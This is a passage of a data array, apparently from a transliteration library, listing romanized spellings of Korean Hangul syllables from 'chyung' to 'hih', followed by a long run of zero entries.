"chyung","chyuj","chyuch","chyuk","chyut","chyup","chyuh","cheu","cheug","cheukk","cheugs","cheun","cheunj","cheunh","cheud","cheul","cheulg","cheulm","cheulb","cheuls","cheult","cheulp","cheulh","cheum","cheub","cheubs","cheus","cheuss","cheung","cheuj","cheuch","cheuk","cheut","cheup","cheuh","chui","chuig","chuikk","chuigs","chuin","chuinj","chuinh","chuid","chuil","chuilg","chuilm","chuilb","chuils","chuilt","chuilp","chuilh","chuim","chuib","chuibs","chuis","chuiss","chuing","chuij","chuich","chuik","chuit","chuip","chuih","chi","chig","chikk","chigs","chin","chinj","chinh","chid","chil","chilg","chilm","chilb","chils","chilt","chilp","chilh","chim","chib","chibs","chis","chiss","ching","chij","chich","chik","chit","chip","chih","ka","kag","kakk","kags","kan","kanj","kanh","kad","kal","kalg","kalm","kalb","kals","kalt","kalp","kalh","kam","kab","kabs","kas","kass","kang","kaj","kach","kak","kat","kap","kah","kae","kaeg","kaekk","kaegs","kaen","kaenj","kaenh","kaed","kael","kaelg",
"kaelm","kaelb","kaels","kaelt","kaelp","kaelh","kaem","kaeb","kaebs","kaes","kaess","kaeng","kaej","kaech","kaek","kaet","kaep","kaeh","kya","kyag","kyakk","kyags","kyan","kyanj","kyanh","kyad","kyal","kyalg","kyalm","kyalb","kyals","kyalt","kyalp","kyalh","kyam","kyab","kyabs","kyas","kyass","kyang","kyaj","kyach","kyak","kyat","kyap","kyah","kyae","kyaeg","kyaekk","kyaegs","kyaen","kyaenj","kyaenh","kyaed","kyael","kyaelg","kyaelm","kyaelb","kyaels","kyaelt","kyaelp","kyaelh","kyaem","kyaeb","kyaebs","kyaes","kyaess","kyaeng","kyaej","kyaech","kyaek","kyaet","kyaep","kyaeh","keo","keog","keokk","keogs","keon","keonj","keonh","keod","keol","keolg","keolm","keolb","keols","keolt","keolp","keolh","keom","keob","keobs","keos","keoss","keong","keoj","keoch","keok","keot","keop","keoh","ke","keg","kekk","kegs","ken","kenj","kenh","ked","kel","kelg","kelm","kelb","kels","kelt","kelp","kelh","kem","keb","kebs","kes","kess","keng","kej","kech","kek","ket","kep",
"keh","kyeo","kyeog","kyeokk","kyeogs","kyeon","kyeonj","kyeonh","kyeod","kyeol","kyeolg","kyeolm","kyeolb","kyeols","kyeolt","kyeolp","kyeolh","kyeom","kyeob","kyeobs","kyeos","kyeoss","kyeong","kyeoj","kyeoch","kyeok","kyeot","kyeop","kyeoh","kye","kyeg","kyekk","kyegs","kyen","kyenj","kyenh","kyed","kyel","kyelg","kyelm","kyelb","kyels","kyelt","kyelp","kyelh","kyem","kyeb","kyebs","kyes","kyess","kyeng","kyej","kyech","kyek","kyet","kyep","kyeh","ko","kog","kokk","kogs","kon","konj","konh","kod","kol","kolg","kolm","kolb","kols","kolt","kolp","kolh","kom","kob","kobs","kos","koss","kong","koj","koch","kok","kot","kop","koh","kwa","kwag","kwakk","kwags","kwan","kwanj","kwanh","kwad","kwal","kwalg","kwalm","kwalb","kwals","kwalt","kwalp","kwalh","kwam","kwab","kwabs","kwas","kwass","kwang","kwaj","kwach","kwak","kwat","kwap","kwah","kwae","kwaeg","kwaekk","kwaegs","kwaen","kwaenj","kwaenh","kwaed","kwael","kwaelg","kwaelm","kwaelb","kwaels","kwaelt","kwaelp","kwaelh",
"kwaem","kwaeb","kwaebs","kwaes","kwaess","kwaeng","kwaej","kwaech","kwaek","kwaet","kwaep","kwaeh","koe","koeg","koekk","koegs","koen","koenj","koenh","koed","koel","koelg","koelm","koelb","koels","koelt","koelp","koelh","koem","koeb","koebs","koes","koess","koeng","koej","koech","koek","koet","koep","koeh","kyo","kyog","kyokk","kyogs","kyon","kyonj","kyonh","kyod","kyol","kyolg","kyolm","kyolb","kyols","kyolt","kyolp","kyolh","kyom","kyob","kyobs","kyos","kyoss","kyong","kyoj","kyoch","kyok","kyot","kyop","kyoh","ku","kug","kukk","kugs","kun","kunj","kunh","kud","kul","kulg","kulm","kulb","kuls","kult","kulp","kulh","kum","kub","kubs","kus","kuss","kung","kuj","kuch","kuk","kut","kup","kuh","kwo","kwog","kwokk","kwogs","kwon","kwonj","kwonh","kwod","kwol","kwolg","kwolm","kwolb","kwols","kwolt","kwolp","kwolh","kwom","kwob","kwobs","kwos","kwoss","kwong","kwoj","kwoch","kwok","kwot","kwop","kwoh","kwe","kweg","kwekk","kwegs","kwen",
"kwenj","kwenh","kwed","kwel","kwelg","kwelm","kwelb","kwels","kwelt","kwelp","kwelh","kwem","kweb","kwebs","kwes","kwess","kweng","kwej","kwech","kwek","kwet","kwep","kweh","kwi","kwig","kwikk","kwigs","kwin","kwinj","kwinh","kwid","kwil","kwilg","kwilm","kwilb","kwils","kwilt","kwilp","kwilh","kwim","kwib","kwibs","kwis","kwiss","kwing","kwij","kwich","kwik","kwit","kwip","kwih","kyu","kyug","kyukk","kyugs","kyun","kyunj","kyunh","kyud","kyul","kyulg","kyulm","kyulb","kyuls","kyult","kyulp","kyulh","kyum","kyub","kyubs","kyus","kyuss","kyung","kyuj","kyuch","kyuk","kyut","kyup","kyuh","keu","keug","keukk","keugs","keun","keunj","keunh","keud","keul","keulg","keulm","keulb","keuls","keult","keulp","keulh","keum","keub","keubs","keus","keuss","keung","keuj","keuch","keuk","keut","keup","keuh","kui","kuig","kuikk","kuigs","kuin","kuinj","kuinh","kuid","kuil","kuilg","kuilm","kuilb","kuils","kuilt","kuilp","kuilh","kuim","kuib","kuibs","kuis","kuiss","kuing",
"kuij","kuich","kuik","kuit","kuip","kuih","ki","kig","kikk","kigs","kin","kinj","kinh","kid","kil","kilg","kilm","kilb","kils","kilt","kilp","kilh","kim","kib","kibs","kis","kiss","king","kij","kich","kik","kit","kip","kih","ta","tag","takk","tags","tan","tanj","tanh","tad","tal","talg","talm","talb","tals","talt","talp","talh","tam","tab","tabs","tas","tass","tang","taj","tach","tak","tat","tap","tah","tae","taeg","taekk","taegs","taen","taenj","taenh","taed","tael","taelg","taelm","taelb","taels","taelt","taelp","taelh","taem","taeb","taebs","taes","taess","taeng","taej","taech","taek","taet","taep","taeh","tya","tyag","tyakk","tyags","tyan","tyanj","tyanh","tyad","tyal","tyalg","tyalm","tyalb","tyals","tyalt","tyalp","tyalh","tyam","tyab","tyabs","tyas","tyass","tyang","tyaj","tyach","tyak","tyat","tyap","tyah","tyae","tyaeg","tyaekk","tyaegs","tyaen","tyaenj","tyaenh","tyaed","tyael","tyaelg","tyaelm",
"tyaelb","tyaels","tyaelt","tyaelp","tyaelh","tyaem","tyaeb","tyaebs","tyaes","tyaess","tyaeng","tyaej","tyaech","tyaek","tyaet","tyaep","tyaeh","teo","teog","teokk","teogs","teon","teonj","teonh","teod","teol","teolg","teolm","teolb","teols","teolt","teolp","teolh","teom","teob","teobs","teos","teoss","teong","teoj","teoch","teok","teot","teop","teoh","te","teg","tekk","tegs","ten","tenj","tenh","ted","tel","telg","telm","telb","tels","telt","telp","telh","tem","teb","tebs","tes","tess","teng","tej","tech","tek","tet","tep","teh","tyeo","tyeog","tyeokk","tyeogs","tyeon","tyeonj","tyeonh","tyeod","tyeol","tyeolg","tyeolm","tyeolb","tyeols","tyeolt","tyeolp","tyeolh","tyeom","tyeob","tyeobs","tyeos","tyeoss","tyeong","tyeoj","tyeoch","tyeok","tyeot","tyeop","tyeoh","tye","tyeg","tyekk","tyegs","tyen","tyenj","tyenh","tyed","tyel","tyelg","tyelm","tyelb","tyels","tyelt","tyelp","tyelh","tyem","tyeb","tyebs","tyes","tyess","tyeng","tyej","tyech","tyek","tyet","tyep","tyeh",
"to","tog","tokk","togs","ton","tonj","tonh","tod","tol","tolg","tolm","tolb","tols","tolt","tolp","tolh","tom","tob","tobs","tos","toss","tong","toj","toch","tok","tot","top","toh","twa","twag","twakk","twags","twan","twanj","twanh","twad","twal","twalg","twalm","twalb","twals","twalt","twalp","twalh","twam","twab","twabs","twas","twass","twang","twaj","twach","twak","twat","twap","twah","twae","twaeg","twaekk","twaegs","twaen","twaenj","twaenh","twaed","twael","twaelg","twaelm","twaelb","twaels","twaelt","twaelp","twaelh","twaem","twaeb","twaebs","twaes","twaess","twaeng","twaej","twaech","twaek","twaet","twaep","twaeh","toe","toeg","toekk","toegs","toen","toenj","toenh","toed","toel","toelg","toelm","toelb","toels","toelt","toelp","toelh","toem","toeb","toebs","toes","toess","toeng","toej","toech","toek","toet","toep","toeh","tyo","tyog","tyokk","tyogs","tyon","tyonj","tyonh","tyod","tyol","tyolg","tyolm","tyolb","tyols","tyolt","tyolp","tyolh","tyom",
"tyob","tyobs","tyos","tyoss","tyong","tyoj","tyoch","tyok","tyot","tyop","tyoh","tu","tug","tukk","tugs","tun","tunj","tunh","tud","tul","tulg","tulm","tulb","tuls","tult","tulp","tulh","tum","tub","tubs","tus","tuss","tung","tuj","tuch","tuk","tut","tup","tuh","two","twog","twokk","twogs","twon","twonj","twonh","twod","twol","twolg","twolm","twolb","twols","twolt","twolp","twolh","twom","twob","twobs","twos","twoss","twong","twoj","twoch","twok","twot","twop","twoh","twe","tweg","twekk","twegs","twen","twenj","twenh","twed","twel","twelg","twelm","twelb","twels","twelt","twelp","twelh","twem","tweb","twebs","twes","twess","tweng","twej","twech","twek","twet","twep","tweh","twi","twig","twikk","twigs","twin","twinj","twinh","twid","twil","twilg","twilm","twilb","twils","twilt","twilp","twilh","twim","twib","twibs","twis","twiss","twing","twij","twich","twik","twit","twip","twih","tyu","tyug","tyukk","tyugs","tyun","tyunj",
"tyunh","tyud","tyul","tyulg","tyulm","tyulb","tyuls","tyult","tyulp","tyulh","tyum","tyub","tyubs","tyus","tyuss","tyung","tyuj","tyuch","tyuk","tyut","tyup","tyuh","teu","teug","teukk","teugs","teun","teunj","teunh","teud","teul","teulg","teulm","teulb","teuls","teult","teulp","teulh","teum","teub","teubs","teus","teuss","teung","teuj","teuch","teuk","teut","teup","teuh","tui","tuig","tuikk","tuigs","tuin","tuinj","tuinh","tuid","tuil","tuilg","tuilm","tuilb","tuils","tuilt","tuilp","tuilh","tuim","tuib","tuibs","tuis","tuiss","tuing","tuij","tuich","tuik","tuit","tuip","tuih","ti","tig","tikk","tigs","tin","tinj","tinh","tid","til","tilg","tilm","tilb","tils","tilt","tilp","tilh","tim","tib","tibs","tis","tiss","ting","tij","tich","tik","tit","tip","tih","pa","pag","pakk","pags","pan","panj","panh","pad","pal","palg","palm","palb","pals","palt","palp","palh","pam","pab","pabs","pas","pass","pang","paj",
"pach","pak","pat","pap","pah","pae","paeg","paekk","paegs","paen","paenj","paenh","paed","pael","paelg","paelm","paelb","paels","paelt","paelp","paelh","paem","paeb","paebs","paes","paess","paeng","paej","paech","paek","paet","paep","paeh","pya","pyag","pyakk","pyags","pyan","pyanj","pyanh","pyad","pyal","pyalg","pyalm","pyalb","pyals","pyalt","pyalp","pyalh","pyam","pyab","pyabs","pyas","pyass","pyang","pyaj","pyach","pyak","pyat","pyap","pyah","pyae","pyaeg","pyaekk","pyaegs","pyaen","pyaenj","pyaenh","pyaed","pyael","pyaelg","pyaelm","pyaelb","pyaels","pyaelt","pyaelp","pyaelh","pyaem","pyaeb","pyaebs","pyaes","pyaess","pyaeng","pyaej","pyaech","pyaek","pyaet","pyaep","pyaeh","peo","peog","peokk","peogs","peon","peonj","peonh","peod","peol","peolg","peolm","peolb","peols","peolt","peolp","peolh","peom","peob","peobs","peos","peoss","peong","peoj","peoch","peok","peot","peop","peoh","pe","peg","pekk","pegs","pen","penj","penh","ped","pel","pelg","pelm","pelb",
"pels","pelt","pelp","pelh","pem","peb","pebs","pes","pess","peng","pej","pech","pek","pet","pep","peh","pyeo","pyeog","pyeokk","pyeogs","pyeon","pyeonj","pyeonh","pyeod","pyeol","pyeolg","pyeolm","pyeolb","pyeols","pyeolt","pyeolp","pyeolh","pyeom","pyeob","pyeobs","pyeos","pyeoss","pyeong","pyeoj","pyeoch","pyeok","pyeot","pyeop","pyeoh","pye","pyeg","pyekk","pyegs","pyen","pyenj","pyenh","pyed","pyel","pyelg","pyelm","pyelb","pyels","pyelt","pyelp","pyelh","pyem","pyeb","pyebs","pyes","pyess","pyeng","pyej","pyech","pyek","pyet","pyep","pyeh","po","pog","pokk","pogs","pon","ponj","ponh","pod","pol","polg","polm","polb","pols","polt","polp","polh","pom","pob","pobs","pos","poss","pong","poj","poch","pok","pot","pop","poh","pwa","pwag","pwakk","pwags","pwan","pwanj","pwanh","pwad","pwal","pwalg","pwalm","pwalb","pwals","pwalt","pwalp","pwalh","pwam","pwab","pwabs","pwas","pwass","pwang","pwaj","pwach","pwak","pwat","pwap","pwah","pwae",
"pwaeg","pwaekk","pwaegs","pwaen","pwaenj","pwaenh","pwaed","pwael","pwaelg","pwaelm","pwaelb","pwaels","pwaelt","pwaelp","pwaelh","pwaem","pwaeb","pwaebs","pwaes","pwaess","pwaeng","pwaej","pwaech","pwaek","pwaet","pwaep","pwaeh","poe","poeg","poekk","poegs","poen","poenj","poenh","poed","poel","poelg","poelm","poelb","poels","poelt","poelp","poelh","poem","poeb","poebs","poes","poess","poeng","poej","poech","poek","poet","poep","poeh","pyo","pyog","pyokk","pyogs","pyon","pyonj","pyonh","pyod","pyol","pyolg","pyolm","pyolb","pyols","pyolt","pyolp","pyolh","pyom","pyob","pyobs","pyos","pyoss","pyong","pyoj","pyoch","pyok","pyot","pyop","pyoh","pu","pug","pukk","pugs","pun","punj","punh","pud","pul","pulg","pulm","pulb","puls","pult","pulp","pulh","pum","pub","pubs","pus","puss","pung","puj","puch","puk","put","pup","puh","pwo","pwog","pwokk","pwogs","pwon","pwonj","pwonh","pwod","pwol","pwolg","pwolm","pwolb","pwols","pwolt","pwolp","pwolh","pwom","pwob",
"pwobs","pwos","pwoss","pwong","pwoj","pwoch","pwok","pwot","pwop","pwoh","pwe","pweg","pwekk","pwegs","pwen","pwenj","pwenh","pwed","pwel","pwelg","pwelm","pwelb","pwels","pwelt","pwelp","pwelh","pwem","pweb","pwebs","pwes","pwess","pweng","pwej","pwech","pwek","pwet","pwep","pweh","pwi","pwig","pwikk","pwigs","pwin","pwinj","pwinh","pwid","pwil","pwilg","pwilm","pwilb","pwils","pwilt","pwilp","pwilh","pwim","pwib","pwibs","pwis","pwiss","pwing","pwij","pwich","pwik","pwit","pwip","pwih","pyu","pyug","pyukk","pyugs","pyun","pyunj","pyunh","pyud","pyul","pyulg","pyulm","pyulb","pyuls","pyult","pyulp","pyulh","pyum","pyub","pyubs","pyus","pyuss","pyung","pyuj","pyuch","pyuk","pyut","pyup","pyuh","peu","peug","peukk","peugs","peun","peunj","peunh","peud","peul","peulg","peulm","peulb","peuls","peult","peulp","peulh","peum","peub","peubs","peus","peuss","peung","peuj","peuch","peuk","peut","peup","peuh","pui","puig","puikk","puigs","puin","puinj","puinh",
"puid","puil","puilg","puilm","puilb","puils","puilt","puilp","puilh","puim","puib","puibs","puis","puiss","puing","puij","puich","puik","puit","puip","puih","pi","pig","pikk","pigs","pin","pinj","pinh","pid","pil","pilg","pilm","pilb","pils","pilt","pilp","pilh","pim","pib","pibs","pis","piss","ping","pij","pich","pik","pit","pip","pih","ha","hag","hakk","hags","han","hanj","hanh","had","hal","halg","halm","halb","hals","halt","halp","halh","ham","hab","habs","has","hass","hang","haj","hach","hak","hat","hap","hah","hae","haeg","haekk","haegs","haen","haenj","haenh","haed","hael","haelg","haelm","haelb","haels","haelt","haelp","haelh","haem","haeb","haebs","haes","haess","haeng","haej","haech","haek","haet","haep","haeh","hya","hyag","hyakk","hyags","hyan","hyanj","hyanh","hyad","hyal","hyalg","hyalm","hyalb","hyals","hyalt","hyalp","hyalh","hyam","hyab","hyabs","hyas","hyass","hyang","hyaj","hyach",
"hyak","hyat","hyap","hyah","hyae","hyaeg","hyaekk","hyaegs","hyaen","hyaenj","hyaenh","hyaed","hyael","hyaelg","hyaelm","hyaelb","hyaels","hyaelt","hyaelp","hyaelh","hyaem","hyaeb","hyaebs","hyaes","hyaess","hyaeng","hyaej","hyaech","hyaek","hyaet","hyaep","hyaeh","heo","heog","heokk","heogs","heon","heonj","heonh","heod","heol","heolg","heolm","heolb","heols","heolt","heolp","heolh","heom","heob","heobs","heos","heoss","heong","heoj","heoch","heok","heot","heop","heoh","he","heg","hekk","hegs","hen","henj","henh","hed","hel","helg","helm","helb","hels","helt","help","helh","hem","heb","hebs","hes","hess","heng","hej","hech","hek","het","hep","heh","hyeo","hyeog","hyeokk","hyeogs","hyeon","hyeonj","hyeonh","hyeod","hyeol","hyeolg","hyeolm","hyeolb","hyeols","hyeolt","hyeolp","hyeolh","hyeom","hyeob","hyeobs","hyeos","hyeoss","hyeong","hyeoj","hyeoch","hyeok","hyeot","hyeop","hyeoh","hye","hyeg","hyekk","hyegs","hyen","hyenj","hyenh","hyed","hyel","hyelg","hyelm","hyelb","hyels",
"hyelt","hyelp","hyelh","hyem","hyeb","hyebs","hyes","hyess","hyeng","hyej","hyech","hyek","hyet","hyep","hyeh","ho","hog","hokk","hogs","hon","honj","honh","hod","hol","holg","holm","holb","hols","holt","holp","holh","hom","hob","hobs","hos","hoss","hong","hoj","hoch","hok","hot","hop","hoh","hwa","hwag","hwakk","hwags","hwan","hwanj","hwanh","hwad","hwal","hwalg","hwalm","hwalb","hwals","hwalt","hwalp","hwalh","hwam","hwab","hwabs","hwas","hwass","hwang","hwaj","hwach","hwak","hwat","hwap","hwah","hwae","hwaeg","hwaekk","hwaegs","hwaen","hwaenj","hwaenh","hwaed","hwael","hwaelg","hwaelm","hwaelb","hwaels","hwaelt","hwaelp","hwaelh","hwaem","hwaeb","hwaebs","hwaes","hwaess","hwaeng","hwaej","hwaech","hwaek","hwaet","hwaep","hwaeh","hoe","hoeg","hoekk","hoegs","hoen","hoenj","hoenh","hoed","hoel","hoelg","hoelm","hoelb","hoels","hoelt","hoelp","hoelh","hoem","hoeb","hoebs","hoes","hoess","hoeng","hoej","hoech","hoek","hoet","hoep","hoeh","hyo","hyog",
"hyokk","hyogs","hyon","hyonj","hyonh","hyod","hyol","hyolg","hyolm","hyolb","hyols","hyolt","hyolp","hyolh","hyom","hyob","hyobs","hyos","hyoss","hyong","hyoj","hyoch","hyok","hyot","hyop","hyoh","hu","hug","hukk","hugs","hun","hunj","hunh","hud","hul","hulg","hulm","hulb","huls","hult","hulp","hulh","hum","hub","hubs","hus","huss","hung","huj","huch","huk","hut","hup","huh","hwo","hwog","hwokk","hwogs","hwon","hwonj","hwonh","hwod","hwol","hwolg","hwolm","hwolb","hwols","hwolt","hwolp","hwolh","hwom","hwob","hwobs","hwos","hwoss","hwong","hwoj","hwoch","hwok","hwot","hwop","hwoh","hwe","hweg","hwekk","hwegs","hwen","hwenj","hwenh","hwed","hwel","hwelg","hwelm","hwelb","hwels","hwelt","hwelp","hwelh","hwem","hweb","hwebs","hwes","hwess","hweng","hwej","hwech","hwek","hwet","hwep","hweh","hwi","hwig","hwikk","hwigs","hwin","hwinj","hwinh","hwid","hwil","hwilg","hwilm","hwilb","hwils","hwilt","hwilp","hwilh","hwim","hwib","hwibs",
"hwis","hwiss","hwing","hwij","hwich","hwik","hwit","hwip","hwih","hyu","hyug","hyukk","hyugs","hyun","hyunj","hyunh","hyud","hyul","hyulg","hyulm","hyulb","hyuls","hyult","hyulp","hyulh","hyum","hyub","hyubs","hyus","hyuss","hyung","hyuj","hyuch","hyuk","hyut","hyup","hyuh","heu","heug","heukk","heugs","heun","heunj","heunh","heud","heul","heulg","heulm","heulb","heuls","heult","heulp","heulh","heum","heub","heubs","heus","heuss","heung","heuj","heuch","heuk","heut","heup","heuh","hui","huig","huikk","huigs","huin","huinj","huinh","huid","huil","huilg","huilm","huilb","huils","huilt","huilp","huilh","huim","huib","huibs","huis","huiss","huing","huij","huich","huik","huit","huip","huih","hi","hig","hikk","higs","hin","hinj","hinh","hid","hil","hilg","hilm","hilb","hils","hilt","hilp","hilh","him","hib","hibs","his","hiss","hing","hij","hich","hik","hit","hip","hih",0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
